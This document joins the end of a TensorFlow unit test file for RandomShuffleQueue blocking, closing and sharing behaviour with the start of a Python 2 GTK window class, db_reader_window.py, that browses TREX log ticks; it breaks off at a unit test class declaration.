dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
# While the last dequeue failed, we want to insure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
def testBlockingEnqueueToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
sess.run(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
sess.run(blocking_enqueue_op)
# At this point the close operation will become unblocked, so the
# next enqueue will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
self.assertEqual(size_t.eval(), 4)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# The close_op should run before the second blocking_enqueue_op
# has started.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
def testSharedQueueSameSession(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.eval()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.eval()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.eval()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.eval()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.eval()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.eval()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.eval()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.eval()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.eval()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.eval()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.eval()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("Index must be in the range"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
db_reader_window.py
|
#!/usr/bin/env python
# System modules
import sys
import os,stat
import shutil
import time
import threading
import gtk
import gtk.glade
import unittest
# TREX modules
import TREX.util
from TREX.widgets_gtk import trex_glade_path
from TREX.core.assembly import Assembly
from TREX.io.db_reader import DbReader
##############################################################################
# DbReaderWindow
# This window provides a user with controls to step to any tick and re-run
# the data loader. It also does continuous polling of the file system in
# order to grab data for visualization as it is written to disk.
##############################################################################
# DbReaderWindow GTK widget class
class DbReaderWindow():
def __init__(self,db_reader=DbReader(),log_path="."):
# Store db reader
self.db_reader = db_reader
# Store path state information
self.log_path = log_path
self.reactor_name = ""
self.reactor_names = []
self.ticks = []
self.tick = 0
self.status_text = ""
# Initialize assembly dict self.db_cores[reactor_name]
self.db_cores = {}
# Listener structures
self.listeners = []
# Create glade window
tree = gtk.glade.XML(trex_glade_path("db_reader_window.glade"))
self.w = tree.get_widget("db_reader_window")
self.w.set_title("TREX Log Reader Control")
# Add references to all widgets
for w in tree.get_widget_prefix('_'):
name = w.get_name()[1:]
# Make sure we don't clobber existing attributes
assert not hasattr(self, name)
setattr(self, name, w)
self.path_chooser.set_filename(os.path.abspath(self.log_path))
self.path_chooser.connect("selection-changed",self.on_change_log_path)
self.reactor_chooser.connect("changed",self.on_change_reactor)
self.tick_combo_model = gtk.ListStore(str)
self.tick_combo_entry.set_model(self.tick_combo_model)
self.tick_combo_entry.set_text_column(0)
self.tick_entry.set_text(str(self.tick))
self.w.set_default(self.go_but)
self.go_but.connect("clicked",self.on_tick_set)
self.st_but.connect("clicked",self.on_tick_set_index,0)
self.bk_but.connect("clicked",self.on_tick_inc_index,-1)
self.fw_but.connect("clicked",self.on_tick_inc_index,1)
self.en_but.connect("clicked",self.on_tick_set_index,-1)
self.latest_toggle.connect("toggled",self.on_toggle_latest)
# Connect the load setting controls
self.assembly_ticks_only_check.connect("toggled",self.on_change_load_settings)
self.load_available_assembly_check.connect("toggled",self.on_change_load_settings)
self.assembly_ticks_only = False
self.load_available_assemblies = True
# Spin up the reload thread used to track the latest file
self.do_reload = False
self.running = True
self.reload_lock = threading.RLock()
self.reload_thread = threading.Thread(target=self.latest_reload_loop)
self.reload_thread.start()
self.w.connect("destroy", self.on_destroy)
self.w.show()
############################################################################
# Event Handlers
############################################################################
# Destruction handler to clean up threads
def on_destroy(self,widget):
self.running = False
self.reload_thread.join()
return True
# Callback for updating the log_path and gui fields when the log_path is changed
def on_change_log_path(self,widget):
if self.log_path == self.path_chooser.get_filename():
return False
self.log_path = self.path_chooser.get_filename()
self.load_available_reactors()
self.load_available_ticks()
# Try to load the latest tick
if len(self.ticks) > 0:
self.load_tick(self.ticks[-1])
# Callback for updating the reactor path when a different reactor is selected
def on_change_reactor(self,widget):
self.reactor_name = self.reactor_chooser.get_active_text()
# Note there is no need to re-load ticks because these are the same across reactors
if len(self.ticks) > 0:
self.load_tick(self.tick)
# Callback for setting the tick value
def on_tick_set(self,widget):
try:
self.load_tick(self.unformat_tick(self.tick_entry.get_text()))
except:
self.set_status("Malformatted tick entry!")
# Callback for setting the tick index
def on_tick_set_index(self,widget,index):
self.load_tick(self.ticks[index])
# Callback for incrementing the tick index
def on_tick_inc_index(self,widget,index_inc):
tick = self.tick_increment(index_inc)
self.load_tick(tick)
# Callback for toggling latest tick tracking
def on_toggle_latest(self,widget):
enabled = self.latest_toggle.get_active()
self.reload_lock.acquire()
self.do_reload = enabled
self.reload_lock.release()
self.update_available_buttons();
# Callback for changing load parameters
def on_change_load_settings(self,widget):
# Get the tick restrictions
self.assembly_ticks_only = self.assembly_ticks_only_check.get_active()
self.load_available_assemblies = self.load_available_assembly_check.get_active()
############################################################################
# GUI interaction
############################################################################
# Load the reactors in the current log path and update the drop-down list accordingly
def load_available_reactors(self):
# Initialize available reactir names
available_reactor_names = []
try:
# Get the available reactors from the db reader
available_reactor_names = self.db_reader.get_available_reactors(self.log_path)
except OSError:
self.set_status("No reactor list at log path.")
except:
self.set_status("Failed to load reactor list from log path.")
self.reactor_names = []
self.reactor_name = ""
# If any one name has been removed, refresh the list entirely
if len(self.reactor_names) != len(available_reactor_names) or not all([name in self.reactor_names for name in available_reactor_names]):
# Empty the dropdown list
for name in self.reactor_names:
self.reactor_chooser.remove_text(0)
self.reactor_names = []
# Append any names that are found but not already registered
for name in [name for name in available_reactor_names if name not in self.reactor_names]:
self.reactor_chooser.append_text(name)
self.reactor_names.append(name)
# Set the first option in the list to be active
if len(self.reactor_names) > 0 and self.reactor_chooser.get_active() == -1:
self.reactor_chooser.set_active(0)
self.reactor_name = self.reactor_names[0]
# Load the available ticks and update the buttons accordingly
def load_available_ticks(self):
# Initialize available ticks
available_ticks = []
try:
if self.assembly_ticks_only:
available_ticks = self.db_reader.get_available_assemblies(self.log_path,self.reactor_name)
else:
available_ticks = self.db_reader.get_available_db_cores(self.log_path,self.reactor_name)
except:
if self.reactor_name != "":
self.set_status("Failed to load any ticks from log path.")
self.tick = -1
available_ticks = []
self.db_cores = {}
self.reactor_name = None
self.tick_entry.set_text("")
self.notify_listeners()
if len(available_ticks) != len(self.ticks) or (len(self.ticks) + len(available_ticks) > 0 and available_ticks[-1] != self.ticks[-1]):
# Append any names that are found but not already registered
#for t in [t for t in available_ticks if t not in self.ticks]:
#self.tick_combo_model.append([self.format_tick(t)])
self.ticks = available_ticks
# Make sure the selected tick is avaiable
if self.tick not in self.ticks and len(self.ticks) > 0:
# Set the tick to the latest tick
self.tick = self.ticks[-1]
# Update the display
self.update_tick_entry()
# Load the assembly
self.load_tick(self.tick)
# Enable and disable buttons accordingly
self.update_available_buttons()
# This enables and disables the navigator buttons based on the available ticks
def update_available_buttons(self):
# Check if the latest tracking button is enabled
latest_enabled = self.latest_toggle.get_active()
# If there are no reactors, disable the combobox
self.reactor_chooser.set_sensitive(len(self.reactor_names) > 0)
# Set the button sensitivities
if len(self.ticks) == 0 or latest_enabled:
# Disable the other tick control buttons
self.tick_entry.set_sensitive(False)
self.go_but.set_sensitive(False)
self.bk_but.set_sensitive(False)
self.st_but.set_sensitive(False)
self.en_but.set_sensitive(False)
self.fw_but.set_sensitive(False)
else:
self.tick_entry.set_sensitive(True)
self.go_but.set_sensitive(True)
if self.ticks.index(self.tick) == 0:
self.bk_but.set_sensitive(False)
self.st_but.set_sensitive(False)
else:
self.bk_but.set_sensitive(True)
self.st_but.set_sensitive(True)
if self.ticks.index(self.tick) == len(self.ticks)-1:
self.en_but.set_sensitive(False)
self.fw_but.set_sensitive(False)
else:
self.en_but.set_sensitive(True)
self.fw_but.set_sensitive(True)
# Update the text entry to reflect the current tick
def update_tick_entry(self):
self.tick_entry.set_text(self.format_tick(self.tick))
def format_tick(self,tick):
return "%d.%d" % (tick[0],tick[1])
def unformat_tick(self,tick):
i = tick.split(".")
return (int(i[0]),int(i[1]))
# Set the status text
def set_status(self,text):
self.status_text = text
self.statusbar.pop(0)
self.statusbar.push(0,self.status_text)
############################################################################
# Tick manipulation
############################################################################
# Calculate a new tick by incrementing current tick some indices forward or backward
def tick_increment(self, index_inc):
new_tick = 0
try:
cur_index = self.ticks.index(self.tick)
new_tick = self.ticks[cur_index + index_inc]
except:
self.set_status("Tick %d not available." % (new_tick))
return new_tick
############################################################################
# Multi-threaded polling functions
############################################################################
# This function continuously reloads the available ticks in a given reactor path
def latest_reload_loop(self):
while self.running:
gtk.gdk.threads_enter()
self.reload_lock.acquire()
# Check the available reactors
self.load_available_reactors()
# Check the available ticks
self.load_available_ticks()
# Reload if there is a newer tick available
if self.do_reload:
if len(self.ticks) > 0 and self.ticks[-1] != self.tick:
self.load_tick(self.ticks[-1])
self.reload_lock.release()
gtk.gdk.threads_leave()
# Sleep before trying again
time.sleep(0.1)
############################################################################
# DbReader interaction
############################################################################
# Get all available data for a given tick from the db_reader
def load_tick(self,new_tick):
try:
# Check if this tick exists
if new_tick not in self.ticks:
raise IOError
# Clear temporary dict
db_cores = {}
# load data for each reactor
for reactor_name in self.reactor_names:
# Load db cores
db_core = self.db_reader.load_db(
self.log_path,
reactor_name,
new_tick)
# Check load settings for assemblies
if self.load_available_assemblies or self.assembly_ticks_only:
try:
assembly = self.db_reader.load_assembly(
self.log_path,
reactor_name,
new_tick)
# Append the assembly to this db_core
db_core.assembly = assembly
except:
pass
# Append db core to temporary dict
db_cores[reactor_name] = db_core
# If we get here, the tick was loaded successfully
self.db_cores = db_cores
self.tick = new_tick
# Post an update to the status bar
self.set_status("Loaded Tick [%s] from \"%s\"" % (self.format_tick(self.tick),self.reactor_chooser.get_active_text()))
except ValueError:
self.set_status("Invalid tick entry!")
except:
self.set_status("Could not load Tick [%s] from \"%s\"!" % (self.format_tick(new_tick),self.reactor_chooser.get_active_text()))
# Update gui
self.update_tick_entry()
self.update_available_buttons()
# Notify listeners
self.notify_listeners()
############################################################################
# Callback registration for classes that process loaded data
############################################################################
# Function to register on load
def register_listener(self,listener_cb):
self.listeners.append(listener_cb)
# Function to unregister a listener callback
def unregister_listener(self,listener_cb):
if listener_cb in self.listeners:
self.listeners.remove(listener_cb)
# Function that notifies listeners with new assembly when it is loaded
def notify_listeners(self):
for listener in self.listeners:
try:
#print "NOTIFYING %s WITH %s\n\t%s\n\t%s" %(str(listener),self.format_tick(self.tick),str(self.db_cores),self.reactor_name)
listener(self.db_cores, self.reactor_name)
#print "NOTIFIED!"
except:
print "Failed to notify listener: "+str(listener)
# Testing utilities
class GtkTester():
def spawn_gtk_thread(self):
# Spawn the window
gtk_thread = threading.Thread(target=self.gtk_thread)
gtk_thread.start()
def gtk_thread(self):
# Spawn a thread to run gtk in
print "Spawning gtk thread..."
self.db_reader_window.w.connect("destroy",gtk.main_quit)
gtk.main()
# Define a simple listener for callbacks
class SimpleAssemblyListener():
def __init__(self):
self.rules = {}
self.tokens = {}
def cb_rules(self,db_cores,reactor_name):
if reactor_name:
self.rules = db_cores[reactor_name].assembly.rules
print "RECEVIED %d RULES" % len(self.rules)
else:
self.rules = {}
print "EMPTY DATABASE"
def cb_tokens(self,db_cores,reactor_name):
if reactor_name:
self.tokens = db_cores[reactor_name].assembly.tokens
else:
self.tokens = {}
# Unit tests
class TestDbReaderWindow(unittest.TestCase,GtkTester):
